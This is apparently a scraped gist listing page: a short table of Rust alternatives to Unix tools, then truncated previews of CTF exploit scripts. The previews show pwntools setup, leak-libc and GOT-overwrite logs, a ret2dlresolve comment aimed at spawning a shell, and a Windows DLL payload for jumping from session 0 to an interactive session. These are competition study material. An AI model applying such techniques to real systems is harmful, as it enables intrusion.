| Unix tool | Rust version | Windows compatible? | Has prebuild? |
|---|---|---|---|
cat |
bat |
✔ |    |
cd |
zoxide |
✔ | |
cloc |
tokei |
✔ |
crazy hugsy hugsy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.9 | |
| """ | |
| membership - securinets quals 2021 | |
| @_hugsy_ | |
| $ ./xp.py remote | |
| [*] '/home/hugsy/ctf/securinets_quals_2021/membership/membership' | |
| Arch: amd64-64-little | |
| RELRO: Full RELRO |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| """ | |
| $ ./xp.py remote | |
| [+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done | |
| [*] step 1: leak stuff | |
| [+] leaked addresses: | |
| 0x563765daa240 | |
| 0x563765da9b10 | |
| 0x7ffd0d86b5e0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.9 | |
| # | |
| # This exploits `ret2dlresolve` technique: the idea behind this attack is | |
| # to forge fake structures to force the LD runtime resolver to resolve and | |
| # execute `system('/bin/sh')`. | |
| # | |
| # To do that, we forge 2 objects, the Rela (holding the symbol offset) and | |
| # the Sym (holding the symbol information). | |
| # | |
| # Note: if using this attack, offsets must be calculated precisely and remember |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| """ | |
| [*] getting control of banana[1] via banana[3]... | |
| [*] leaking atoi in libc... | |
| [+] leaking atoi(): 7f42bbdfa7a0 | |
| [+] libc base: 7f42bbdba000 | |
| [+] system: 7f42bbe09550 | |
| [*] overwrite atoi@got with system... | |
| [*] trigger system() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| import os, sys | |
| from pwn import * | |
| context.update(arch="amd64", endian="little", os="linux", | |
| terminal=["tmux", "split-window", "-v", "-p 75"],) | |
| LOCAL = True | |
| TARGET_ELF = os.path.realpath("./babyrop") |
hugsy
/ rundll_payload_interactive_session.cc
Created
September 10, 2020 22:01
dll payload to execute code from session 0 to first interactive session
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <TlHelp32.h> | |
| #include <Lmcons.h> | |
| #include <iostream> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| import os | |
| from pwn import * | |
| target = open("flag.enc.orig", "rb").read() | |
| pc = b""" | |
| #include <stdio.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| """ | |
| hugsy@ubuntu-pwn ~/ctf/asisctf_2020/full_protection/full_protection_distfiles ./xp.py remote | |
| [*] '/home/hugsy/ctf/asisctf_2020/full_protection/full_protection_distfiles/chall' | |
| Arch: amd64-64-little | |
| RELRO: Full RELRO | |
| Stack: Canary found |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| import sys | |
| from pwn import * | |
| context.update( | |
| arch="amd64", | |
| endian="little", | |
| os="linux", | |
| # log_level="debug", | |
| terminal=["tmux", "split-window", "-h", "-p 65"], |